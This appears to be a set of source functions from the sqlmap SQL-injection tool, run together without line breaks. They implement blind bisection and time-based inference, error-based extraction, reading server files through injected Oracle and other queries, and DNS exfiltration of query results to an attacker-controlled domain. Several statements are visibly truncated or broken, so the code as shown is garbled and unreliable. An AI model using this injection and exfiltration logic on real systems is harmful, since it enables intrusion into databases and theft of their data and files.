def readFile(self, remoteFile): localFilePaths = [] snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension") for query in snippet.split("\n"): query = query.strip() query = agent.prefixQuery("OR (%s) IS NULL" % query) query = agent.suffixQuery(query, trimEmpty=False) payload = agent.payload(newValue=query) Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) for remoteFile in remoteFile.split(','): if not kb.bruteMode: infoMsg = "fetching file: '%s'" % remoteFile kb.fileReadMode = True fileContent = inject.getValue( "SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL) kb.fileReadMode = False if not isNoneValue(fileContent): fileContent = decodeDbmsHexValue(fileContent, True) if fileContent.strip(): localFilePath = dataToOutFile(remoteFile, fileContent) localFilePaths.append(localFilePath) elif not kb.bruteMode: errMsg = "no data retrieved" logger.error(errMsg) return localFilePaths
def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False): """ Bisection algorithm that can be used to perform blind SQL injection on an affected host """ abortedFlag = False showEta = False partialValue = u"" finalValue = None retrievedLength = 0 if payload is None: return 0, None if charsetType is None and conf.charset: asciiTbl = sorted(set(ord(_) for _ in conf.charset)) else: asciiTbl = getCharset(charsetType) threadData = getCurrentThreadData() timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED)) retVal = hashDBRetrieve(expression, checkConf=True) if retVal: if and INFERENCE_UNKNOWN_CHAR in retVal: pass elif PARTIAL_HEX_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "") if retVal and conf.hexConvert: partialValue = retVal infoMsg = "resuming partial value: %s" % safecharencode( partialValue) elif PARTIAL_VALUE_MARKER in retVal: retVal = retVal.replace(PARTIAL_VALUE_MARKER, "") if retVal and not conf.hexConvert: partialValue = retVal infoMsg = "resuming partial value: %s" % safecharencode( partialValue) else: infoMsg = "resumed: %s" % safecharencode(retVal) return 0, retVal if Backend.isDbms(DBMS.MCKOI): match ="\ASELECT\b(.+)\bFROM\b(.+)\Z", expression, re.I) if match: original = queries[Backend.getIdentifiedDbms()].inference.query right = original.split('<')[1] payload = payload.replace( right, "(SELECT %s FROM %s)" % (right, expression = elif Backend.isDbms(DBMS.FRONTBASE): match = r"\ASELECT\b(\s+TOP\s*\([^)]+\)\s+)?(.+)\bFROM\b(.+)\Z", expression, re.I) if match: payload = payload.replace( INFERENCE_GREATER_CHAR, " FROM %s)%s" % (, INFERENCE_GREATER_CHAR)) payload = payload.replace( "SUBSTRING", "(SELECT%sSUBSTRING" % ( if else " "), 1) expression = try: # Set kb.partRun in case "common prediction" feature (a.k.a. "good samaritan") is used or the engine is called from the API if conf.predictOutput: kb.partRun = getPartRun() elif conf.api: kb.partRun = getPartRun(alias=False) else: kb.partRun = None if partialValue: firstChar = len(partialValue) elif"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): firstChar = 0 elif conf.firstChar is not None and ( isinstance(conf.firstChar, int) or (hasattr(conf.firstChar, "isdigit") and conf.firstChar.isdigit())): firstChar = int(conf.firstChar) - 1 if kb.fileReadMode: firstChar <<= 1 elif hasattr(firstChar, "isdigit") and firstChar.isdigit() or isinstance( firstChar, int): firstChar = int(firstChar) - 1 else: firstChar = 0 if"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression): lastChar = 0 elif conf.lastChar is not None and (isinstance(conf.lastChar, int) or (hasattr(conf.lastChar, "isdigit") and conf.lastChar.isdigit())): lastChar = int(conf.lastChar) elif hasattr(lastChar, "isdigit") and lastChar.isdigit() or isinstance( lastChar, int): lastChar = int(lastChar) else: lastChar = 0 if Backend.getDbms(): _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expressionUnescaped = unescaper.escape(expressionReplaced) else: expressionUnescaped = unescaper.escape(expression) if hasattr(length, "isdigit") and length.isdigit() or isinstance( length, int): length = int(length) else: length = None if length == 0: return 0, "" if length and (lastChar > 0 or firstChar > 0): length = min(length, lastChar or length) - firstChar if length and length > MAX_BISECTION_LENGTH: length = None showEta = conf.eta and isinstance(length, int) if kb.bruteMode: numThreads = 1 else: numThreads = min(conf.threads or 0, length or 0) or 1 if showEta: progress = ProgressBar(maxValue=length) if numThreads > 1: if not timeBasedCompare or kb.forceThreads: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) else: numThreads = 1 if conf.threads == 1 and not any( (timeBasedCompare, conf.predictOutput)): warnMsg = "running in a single-thread mode. Please consider " warnMsg += "usage of option '--threads' for faster data retrieval" singleTimeWarnMessage(warnMsg) if conf.verbose in (1, 2) and not any( (showEta, conf.api, kb.bruteMode)): if isinstance(length, int) and numThreads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) else: dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) def tryHint(idx): with kb.locks.hint: hintValue = kb.hintValue if payload is not None and len( hintValue or "") > 0 and len(hintValue) >= idx: if "'%s'" % CHAR_INFERENCE_MARK in payload: posValue = hintValue[idx - 1] else: posValue = ord(hintValue[idx - 1]) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape( "'%s'" % decodeIntToUnicode(posValue)) forgedPayload = agent.extractPayload(payload) or "" forgedPayload = safeStringFormat( forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue)).replace( markingValue, unescapedCharValue) result = Request.queryPage(agent.replacePayload( payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(getTechnique()) if result: return hintValue[idx - 1] with kb.locks.hint: kb.hintValue = "" return None def validateChar(idx, value): """ Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay """ validationPayload = re.sub( r"(%s.*?)%s(.*?%s)" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r"\g<1>%s\g<2>" % INFERENCE_NOT_EQUALS_CHAR, payload) if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat( validationPayload, (expressionUnescaped, idx, value)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape( "'%s'" % decodeIntToUnicode(value)) forgedPayload = safeStringFormat( validationPayload, (expressionUnescaped, idx)).replace( markingValue, unescapedCharValue) result = not Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) if result and timeBasedCompare and getTechniqueData().trueCode: result = threadData.lastCode == getTechniqueData().trueCode if not result: warnMsg = "detected HTTP code '%s' in validation phase is differing from expected '%s'" % ( threadData.lastCode, getTechniqueData().trueCode) singleTimeWarnMessage(warnMsg) incrementCounter(getTechnique()) return result def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ result = tryHint(idx) if result: return result if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) originalTbl = type(charTbl)(charTbl) if continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] if "'%s'" % CHAR_INFERENCE_MARK in payload: for char in ('\n', '\r'): if ord(char) in charTbl: charTbl.remove(ord(char)) if not charTbl: return None elif len(charTbl) == 1: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(getTechnique()) if result: return decodeIntToUnicode(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minValue = charTbl[0] firstCheck = False lastCheck = False unexpectedCode = False if continuousOrder: while len(charTbl) > 1: position = None if charsetType is None: if not firstCheck: try: try: lastChar = [ _ for _ in threadData.shared.value if _ is not None ][-1] except IndexError: lastChar = None else: if 'a' <= lastChar <= 'z': position = charTbl.index(ord('a') - 1) # 96 elif 'A' <= lastChar <= 'Z': position = charTbl.index(ord('A') - 1) # 64 elif '0' <= lastChar <= '9': position = charTbl.index(ord('0') - 1) # 47 except ValueError: pass finally: firstCheck = True elif not lastCheck and numThreads == 1: # not usable in multi-threading environment if charTbl[(len(charTbl) >> 1)] < ord(' '): try: # favorize last char check if current value inclines toward 0 position = charTbl.index(1) except ValueError: pass finally: lastCheck = True if position is None: position = (len(charTbl) >> 1) posValue = charTbl[position] falsePayload = None if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx, posValue)) falsePayload = safeStringFormat( payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape( "'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, unescapedCharValue) falsePayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, NULL) if timeBasedCompare: if kb.responseTimeMode: kb.responseTimePayload = falsePayload else: kb.responseTimePayload = None result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(getTechnique()) if not timeBasedCompare and getTechniqueData() is not None: unexpectedCode |= threadData.lastCode not in ( getTechniqueData().falseCode, getTechniqueData().trueCode) if unexpectedCode: if threadData.lastCode is not None: warnMsg = "unexpected HTTP code '%s' detected." % threadData.lastCode else: warnMsg = "unexpected response detected." warnMsg += " Will use (extra) validation step in similar cases" singleTimeWarnMessage(warnMsg) if result: minValue = posValue if not isinstance(charTbl, xrange): charTbl = charTbl[position:] else: # xrange() - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if not isinstance(charTbl, xrange): charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if maxValue == 1: return None # Going beyond the original charset elif minValue == maxChar: # If the original charTbl was [0,..,127] new one # will be [128,..,(128 << 4) - 1] or from 128 to 2047 # and instead of making a HUGE list with all the # elements we use a xrange, which is a virtual # list if expand and shiftTable: charTbl = xrange( maxChar + 1, (maxChar + 1) << shiftTable.pop()) originalTbl = xrange(charTbl) maxChar = maxValue = charTbl[-1] minValue = charTbl[0] else: return None else: retVal = minValue + 1 if retVal in originalTbl or ( retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if (timeBasedCompare or unexpectedCode ) and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec threadData.validationRun = 0 if (retried or 0) < MAX_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) if timeBasedCompare: if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: conf.timeSec += 1 warnMsg = "increasing time delay to %d second%s" % ( conf.timeSec, 's' if conf.timeSec > 1 else '') logger.warn(warnMsg) if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: dbgMsg = "turning off time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode( retVal) logger.error(errMsg) conf.timeSec = kb.originalTimeDelay return decodeIntToUnicode(retVal) else: if timeBasedCompare: threadData.validationRun += 1 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun > VALID_TIME_CHARS_RUN_THRESHOLD: dbgMsg = "turning back on time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.YES return decodeIntToUnicode(retVal) else: return None else: if "'%s'" % CHAR_INFERENCE_MARK in payload and conf.charset: errMsg = "option '--charset' is not supported on '%s'" % Backend.getIdentifiedDbms( ) raise SqlmapUnsupportedFeatureException(errMsg) candidates = list(originalTbl) bit = 0 while len(candidates) > 1: bits = {} for candidate in candidates: bit = 0 while candidate: bits.setdefault(bit, 0) bits[bit] += 1 if candidate & 1 else -1 candidate >>= 1 bit += 1 choice = sorted(bits.items(), key=lambda _: abs(_[1]))[0][0] mask = 1 << choice forgedPayload = safeStringFormat( payload.replace( INFERENCE_GREATER_CHAR, "&%d%s" % (mask, INFERENCE_GREATER_CHAR)), (expressionUnescaped, idx, 0)) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(getTechnique()) if result: candidates = [_ for _ in candidates if _ & mask > 0] else: candidates = [_ for _ in candidates if _ & mask == 0] bit += 1 if candidates: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, candidates[0])) result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(getTechnique()) if result: return decodeIntToUnicode(candidates[0]) # Go multi-threading (--threads > 1) if numThreads > 1 and isinstance(length, int) and length > 1: threadData.shared.value = [None] * length threadData.shared.index = [ firstChar ] # As list for python nested function scoping threadData.shared.start = firstChar try: def blindThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.index: if threadData.shared.index[0] - firstChar >= length: return threadData.shared.index[0] += 1 currentCharIndex = threadData.shared.index[0] if kb.threadContinue: val = getChar( currentCharIndex, asciiTbl, not (charsetType is None and conf.charset)) if val is None: val = INFERENCE_UNKNOWN_CHAR else: break # NOTE: if not isListLike(threadData.shared.value): break with kb.locks.value: threadData.shared.value[currentCharIndex - 1 - firstChar] = val currentValue = list(threadData.shared.value) if kb.threadContinue: if showEta: progress.progress(threadData.shared.index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 for i in xrange(length): if currentValue[i] is not None: endCharIndex = max(endCharIndex, i) output = '' if endCharIndex > conf.progressWidth: startCharIndex = endCharIndex - conf.progressWidth count = threadData.shared.start for i in xrange(startCharIndex, endCharIndex + 1): output += '_' if currentValue[ i] is None else filterControlChars( currentValue[i] if len( currentValue[i]) == 1 else ' ', replacement=' ') for i in xrange(length): count += 1 if currentValue[ i] is not None else 0 if startCharIndex > 0: output = ".." + output[2:] if (endCharIndex - startCharIndex == conf.progressWidth) and ( endCharIndex < length - 1): output = output[:-2] + ".." if conf.verbose in (1, 2) and not any( (showEta, conf.api, kb.bruteMode)): _ = count - firstChar output += '_' * ( min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%%)' % ( _, length, int(100.0 * _ / length)) output += status if _ != length else " " * len( status) dataToStdout( "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output)) runThreads(numThreads, blindThread, startThreadMsg=False) except KeyboardInterrupt: abortedFlag = True finally: value = [_ for _ in partialValue] value.extend(_ for _ in threadData.shared.value) infoMsg = None # If we have got one single character not correctly fetched it # can mean that the connection to the target URL was lost if None in value: partialValue = "".join(value[:value.index(None)]) if partialValue: infoMsg = "\r[%s] [INFO] partially retrieved: %s" % ( time.strftime("%X"), filterControlChars(partialValue)) else: finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % ( time.strftime("%X"), filterControlChars(finalValue)) if conf.verbose in (1, 2) and infoMsg and not any( (showEta, conf.api, kb.bruteMode)): dataToStdout(infoMsg) # No multi-threading (--threads = 1) else: index = firstChar threadData.shared.value = "" while True: index += 1 # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for # the moment if conf.predictOutput and len( partialValue) > 0 and kb.partRun is not None: val = None commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan( partialValue, asciiTbl) # If there is one single output in common-outputs, check # it via equal against the query output if commonValue is not None: # One-shot query containing equals commonValue testValue = unescaper.escape( "'%s'" % commonValue ) if "'" not in commonValue else unescaper.escape( "%s" % commonValue, quote=False) query = getTechniqueData().vector query = agent.prefixQuery( query.replace( INFERENCE_MARKER, "(%s)%s%s" % (expressionUnescaped, INFERENCE_EQUALS_CHAR, testValue))) query = agent.suffixQuery(query) result = Request.queryPage( agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(getTechnique()) # Did we have luck? if result: if showEta: progress.progress(len(commonValue)) elif conf.verbose in (1, 2) or conf.api: dataToStdout( filterControlChars(commonValue[index - 1:])) finalValue = commonValue break # If there is a common pattern starting with partialValue, # check it via equal against the substring-query output if commonPattern is not None: # Substring-query containing equals commonPattern subquery = queries[Backend.getIdentifiedDbms( )].substring.query % (expressionUnescaped, 1, len(commonPattern)) testValue = unescaper.escape( "'%s'" % commonPattern ) if "'" not in commonPattern else unescaper.escape( "%s" % commonPattern, quote=False) query = getTechniqueData().vector query = agent.prefixQuery( query.replace(INFERENCE_MARKER, "(%s)=%s" % (subquery, testValue))) query = agent.suffixQuery(query) result = Request.queryPage( agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(getTechnique()) # Did we have luck? if result: val = commonPattern[index - 1:] index += len(val) - 1 # Otherwise if there is no commonValue (single match from # txt/common-outputs.txt) and no commonPattern # (common pattern) use the returned common charset only # to retrieve the query output if not val and commonCharset: val = getChar(index, commonCharset, False) # If we had no luck with commonValue and common charset, # use the returned other charset if not val: val = getChar(index, otherCharset, otherCharset == asciiTbl) else: val = getChar(index, asciiTbl, not (charsetType is None and conf.charset)) if val is None: finalValue = partialValue break if val = threadData.shared.value = partialValue = partialValue + val if showEta: progress.progress(index) elif (conf.verbose in (1, 2) and not kb.bruteMode) or conf.api: dataToStdout(filterControlChars(val)) # Note: some DBMSes (e.g. Firebird, DB2, etc.) have issues with trailing spaces if Backend.getIdentifiedDbms() in ( DBMS.FIREBIRD, DBMS.DB2, DBMS.MAXDB, DBMS.DERBY, DBMS.FRONTBASE ) and len( partialValue) > INFERENCE_BLANK_BREAK and partialValue[ -INFERENCE_BLANK_BREAK:].isspace(): finalValue = partialValue[:-INFERENCE_BLANK_BREAK] break elif charsetType and partialValue[-1:].isspace(): finalValue = partialValue[:-1] break if (lastChar > 0 and index >= lastChar): finalValue = "" if length == 0 else partialValue finalValue = finalValue.rstrip( ) if len(finalValue) > 1 else finalValue partialValue = None break except KeyboardInterrupt: abortedFlag = True finally: kb.prependFlag = False retrievedLength = len(finalValue or "") if finalValue is not None: finalValue = decodeDbmsHexValue( finalValue) if conf.hexConvert else finalValue hashDBWrite(expression, finalValue) elif partialValue: hashDBWrite( expression, "%s%s" % (PARTIAL_VALUE_MARKER if not conf.hexConvert else PARTIAL_HEX_VALUE_MARKER, partialValue)) if conf.hexConvert and not any((abortedFlag, conf.api, kb.bruteMode)): infoMsg = "\r[%s] [INFO] retrieved: %s %s\n" % (time.strftime( "%X"), filterControlChars(finalValue), " " * retrievedLength) dataToStdout(infoMsg) else: if conf.verbose in (1, 2) and not any( (showEta, conf.api, kb.bruteMode)): dataToStdout("\n") if (conf.verbose in (1, 2) and showEta) or conf.verbose >= 3: infoMsg = "retrieved: %s" % filterControlChars(finalValue) if kb.threadException: raise SqlmapThreadException( "something unexpected happened inside the threads") if abortedFlag: raise KeyboardInterrupt _ = finalValue or partialValue return getCounter( getTechnique()), safecharencode(_) if kb.safeCharEncode else _
def _oneShotErrorUse(expression, field=None, chunkTest=False): offset = 1 rotator = 0 partialValue = None threadData = getCurrentThreadData() retVal = hashDBRetrieve(expression, checkConf=True) if retVal and PARTIAL_VALUE_MARKER in retVal: partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")"resuming partial value: '%s'" % _formatPartialContent(partialValue)) offset += len(partialValue) threadData.resumed = retVal is not None and not partialValue if any( Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE) ) and kb.errorChunkLength is None and not chunkTest and not kb.testMode: debugMsg = "searching for error chunk length..." logger.debug(debugMsg) seen = set() current = MAX_ERROR_CHUNK_LENGTH while current >= MIN_ERROR_CHUNK_LENGTH: testChar = str(current % 10) if Backend.isDbms(DBMS.ORACLE): testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar) else: testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms( DBMS.MYSQL) else "REPLICATE", testChar, current) testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery) result = unArrayizeValue( _oneShotErrorUse(testQuery, chunkTest=True)) seen.add(current) if (result or "").startswith(testChar): if result == testChar * current: kb.errorChunkLength = current break else: result ="\A\w+", result).group(0) candidate = len(result) - len(kb.chars.stop) current = candidate if candidate != current and candidate not in seen else current - 1 else: current = current // 2 if kb.errorChunkLength: hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength) else: kb.errorChunkLength = 0 if retVal is None or partialValue: try: while True: check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start if field: nulledCastedField = agent.nullAndCastField(field) if any( Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE) ) and not any(_ in field for _ in ("COUNT", "CASE") ) and kb.errorChunkLength and not chunkTest: extendedField = r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0) if extendedField != field: # e.g. MIN(surname) nulledCastedField = extendedField.replace( field, nulledCastedField) field = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms( )].substring.query % (nulledCastedField, offset, kb.errorChunkLength) # Forge the error-based SQL injection request vector = getTechniqueData().vector query = agent.prefixQuery(vector) query = agent.suffixQuery(query) injExpression = expression.replace(field, nulledCastedField, 1) if field else expression injExpression = unescaper.escape(injExpression) injExpression = query.replace("[QUERY]", injExpression) payload = agent.payload(newValue=injExpression) # Perform the request page, headers, _ = Request.queryPage(payload, content=True, raise404=False) incrementCounter(getTechnique()) if page and conf.noEscape: page = re.sub( r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page) # Parse the returned page to get the exact error-based # SQL injection output output = firstNotNone( extractRegexResult(check, page), extractRegexResult( check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), extractRegexResult( check, listToStrValue(( headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower() ) if headers else None)), extractRegexResult( check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)) if output is not None: output = getUnicode(output) else: trimmed = firstNotNone( extractRegexResult(trimCheck, page), extractRegexResult( trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), extractRegexResult( trimCheck, listToStrValue(( headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower() ) if headers else None)), extractRegexResult( trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)) if trimmed: if not chunkTest: warnMsg = "possible server trimmed output detected " warnMsg += "(due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) if not kb.testMode: check = r"(?P<result>[^<>\n]*?)%s" % kb.chars.stop[: 2] output = extractRegexResult( check, trimmed, re.IGNORECASE) if not output: check = r"(?P<result>[^\s<>'\"]+)" output = extractRegexResult( check, trimmed, re.IGNORECASE) else: output = output.rstrip() if any( Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)): if offset == 1: retVal = output else: retVal += output if output else '' if output and kb.errorChunkLength and len( output) >= kb.errorChunkLength and not chunkTest: offset += kb.errorChunkLength else: break if output and conf.verbose in (1, 2) and not any( (conf.api, kb.bruteMode)): if kb.fileReadMode: dataToStdout( _formatPartialContent(output).replace( r"\n", "\n").replace(r"\t", "\t")) elif offset > 1: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 dataToStdout("\r%s\r" % ROTATING_CHARS[rotator]) else: retVal = output break except: if retVal is not None: hashDBWrite(expression, "%s%s" % (retVal, PARTIAL_VALUE_MARKER)) raise retVal = decodeDbmsHexValue(retVal) if conf.hexConvert else retVal if isinstance(retVal, six.string_types): retVal = htmlUnescape(retVal).replace("<br>", "\n") retVal = _errorReplaceChars(retVal) if retVal is not None: hashDBWrite(expression, retVal) else: _ = "(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) retVal = extractRegexResult(_, retVal) or retVal return safecharencode(retVal) if kb.safeCharEncode else retVal
def readFile(self, remoteFile): localFilePaths = [] self.checkDbmsOs() for remoteFile in remoteFile.split(','): fileContent = None kb.fileReadMode = True if or isStackingAvailable(): if isStackingAvailable(): debugMsg = "going to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) fileContent = self.stackedReadFile(remoteFile) elif Backend.isDbms(DBMS.MYSQL): debugMsg = "going to read the file with a non-stacked query " debugMsg += "SQL injection technique" logger.debug(debugMsg) fileContent = self.nonStackedReadFile(remoteFile) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to read files from the underlying file " errMsg += "system of the back-end %s server" % Backend.getDbms( ) logger.error(errMsg) fileContent = None kb.fileReadMode = False if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) elif isListLike(fileContent): newFileContent = "" for chunk in fileContent: if isListLike(chunk): if len(chunk) > 0: chunk = chunk[0] else: chunk = "" if chunk: newFileContent += chunk fileContent = newFileContent if fileContent is not None: fileContent = decodeDbmsHexValue(fileContent, True) if fileContent.strip(): localFilePath = dataToOutFile(remoteFile, fileContent) if not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) sameFile = self.askCheckReadFile(localFilePath, remoteFile) if sameFile is True: localFilePath += " (same file)" elif sameFile is False: localFilePath += " (size differs from remote file)" localFilePaths.append(localFilePath) elif not kb.bruteMode: errMsg = "no data retrieved" logger.error(errMsg) return localFilePaths
def dnsUse(payload, expression): """ Retrieve the output of a SQL query taking advantage of the DNS resolution mechanism by making request back to attacker's machine. """ start = time.time() retVal = None count = 0 offset = 1 if conf.dnsDomain and Backend.getIdentifiedDbms() in ( DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: output = None if output is None: kb.dnsMode = True while True: count += 1 prefix, suffix = ( "%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2)) chunk_length = MAX_DNS_LABEL // 2 if Backend.getIdentifiedDbms( ) in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL // 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields( expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) extendedField = r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0) if extendedField != fieldToCastStr: # e.g. MIN(surname) nulledCastedField = extendedField.replace( fieldToCastStr, nulledCastedField) fieldToCastStr = extendedField nulledCastedField = queries[Backend.getIdentifiedDbms( )].substring.query % (nulledCastedField, offset, chunk_length) nulledCastedField = agent.hexConvertField(nulledCastedField) expressionReplaced = expression.replace( fieldToCastStr, nulledCastedField, 1) expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsDomain) expressionUnescaped = unescaper.escape(expressionRequest) if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): query = agent.prefixQuery("; %s" % expressionUnescaped) query = "%s%s" % (query, queries[ Backend.getIdentifiedDbms()].comment.query) forgedPayload = agent.payload(newValue=query) else: forgedPayload = safeStringFormat( payload, (expressionUnescaped, randomInt(1), randomInt(3))) Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False) _ = conf.dnsServer.pop(prefix, suffix) if _: _ = extractRegexResult( r"%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I) _ = decodeDbmsHexValue(_) output = (output or "") + _ offset += len(_) if len(_) < chunk_length: break else: break output = decodeDbmsHexValue(output) if conf.hexConvert else output kb.dnsMode = False if output is not None: retVal = output if kb.dnsTest is not None: dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output))) if count > 0: hashDBWrite(expression, output) if not kb.bruteMode: debugMsg = "performed %d quer%s in %.2f seconds" % ( count, 'y' if count == 1 else "ies", calculateDeltaSeconds(start)) logger.debug(debugMsg) elif conf.dnsDomain: warnMsg = "DNS data exfiltration method through SQL injection " warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms( ) singleTimeWarnMessage(warnMsg) return safecharencode(retVal) if kb.safeCharEncode else retVal